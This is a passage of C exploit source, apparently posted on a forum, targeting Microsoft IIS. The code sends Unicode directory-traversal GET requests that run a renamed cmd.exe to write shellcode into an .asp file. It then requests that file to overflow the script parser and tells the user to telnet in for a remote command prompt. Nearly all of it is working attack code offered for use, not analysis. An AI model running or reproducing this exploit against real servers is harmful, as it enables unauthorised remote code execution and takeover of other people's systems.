| Bancho |
//This function moves cmd.exe from winnt\system32 to the found executable directory
int SockFD,i;
struct sockaddr_in DstSAin;
char waste[5000],uniwaste[500];
char space[3];
char *buffer;
printf("Sending the exploit...\n" );
memset(uniwaste,0,499);
for(i=0;i<8;i++)
{
strcat(uniwaste,".." );
strcat(uniwaste,UNISTRING); //Create our drop back url string
}
memset(space,0,3);
strcpy(space,"%20" );
memset(waste,0,5000);
//Create our request buffer that sends cmd.exe (now eeyehack.exe) /c echo ourshellcode > [executable dir]\eeyerulez.asp
sprintf(waste,"GET /%s/%s/%s/eeyehack.exe?/c%secho%s%s%s>%s%s\\eeyerulez.asp HTTP/1.0\n\n",exedir,uniwaste,localpath+3,space,space,shellcode,space,space,localpath);
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
send(SockFD,waste,strlen(waste),0); //send the echo command and shellcode
}
closesocket(SockFD);
//Now request the .asp file and cause the overflow
SockFD=socket(AF_INET,SOCK_STREAM,0);
DstSAin.sin_family = AF_INET;
DstSAin.sin_port = htons(port);
DstSAin.sin_addr.s_addr=iplookup(host);
if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin)))
{
memset(waste,0,5000);
sprintf(waste,"GET /%s/eeyerulez.asp HTTP/1.0\n\n",exedir);
//Request eeyerulez.asp from the remote server
//IIS then tries to process our .asp file and when it reads in the script language buffer it overflows and executes our code
send(SockFD,waste,strlen(waste),0);
buffer=GetData(SockFD);
if(strlen(buffer)==0)
//If we do not get any data back from the server (server crashes) then our exploit probably worked
printf("Exploit sent! Now telnet to %s on port %i and you should get a cmd prompt.\n", host, tport);
else
//If we do get data back from the server then they are probably patched
printf("Exploit failed.\n" ); |
